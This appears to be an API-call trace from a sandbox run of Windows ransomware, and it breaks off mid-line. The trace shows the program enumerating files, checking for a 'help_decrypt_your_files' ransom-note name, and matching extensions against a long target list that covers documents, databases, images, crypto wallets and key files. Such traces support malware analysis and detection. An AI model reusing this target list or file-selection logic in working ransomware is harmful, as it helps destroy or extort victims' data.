	[0176.057] lstrcmpW (lpString1="Power_0.provxml", lpString2="..") returned 1
	[0176.057] lstrcmpW (lpString1="Power_0.provxml", lpString2=".") returned 1
	[0176.058] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.058] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_0.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml"
	[0176.058] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml") returned 109
	[0176.058] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.058] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_0.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml") returned 0x6d
	[0176.058] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.058] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.058] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml"
	[0176.059] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_0.provxml") returned 109
	[0176.059] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.059] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.059] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.060] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.060] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9e7d76e, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x586, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_1.provxml", cAlternateFileName="POWER_~2.PRO")) returned 1
	[0176.060] lstrcmpW (lpString1="Power_1.provxml", lpString2="..") returned 1
	[0176.060] lstrcmpW (lpString1="Power_1.provxml", lpString2=".") returned 1
	[0176.060] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.060] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_1.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml"
	[0176.060] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml") returned 109
	[0176.060] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.061] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_1.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml") returned 0x6d
	[0176.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.061] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.061] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml"
	[0176.061] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_1.provxml") returned 109
	[0176.061] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.061] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.062] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.062] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.062] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".provxml") returned 0x0
	[0176.062] FindNextFileW (in: hFindFile=0xfb9470, lpFindFileData=0x189474 | out: lpFindFileData=0x189474*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9ec9c48, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9ec9c48, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9ec9c48, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x1018, dwReserved0=0x360066, dwReserved1=0x7d0032, cFileName="Power_2.provxml", cAlternateFileName="POWER_~3.PRO")) returned 1
	[0176.062] lstrcmpW (lpString1="Power_2.provxml", lpString2="..") returned 1
	[0176.062] lstrcmpW (lpString1="Power_2.provxml", lpString2=".") returned 1
	[0176.063] lstrcpyW (in: lpString1=0x1896c4, lpString2="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\"
	[0176.063] lstrcatW (in: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\", lpString2="Power_2.provxml" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml") returned="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml"
	[0176.063] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml") returned 109
	[0176.063] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0176.063] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\RunTime\\Power_2.provxml", cchLength=0x6d | out: lpsz="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml") returned 0x6d
	[0176.063] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.063] StrStrW (lpFirst="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml", lpSrch="help_decrypt_your_files") returned 0x0
	[0176.064] lstrcpyW (in: lpString1=0x18926c, lpString2="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml" | out: lpString1="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml") returned="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml"
	[0176.064] lstrlenW (lpString="c:\\users\\all users\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\runtime\\power_2.provxml") returned 109
	[0176.064] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0176.064] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.064] StrStrW (lpFirst=".provxml", lpSrch=".") returned=".provxml"
	[0176.064] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0176.065] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt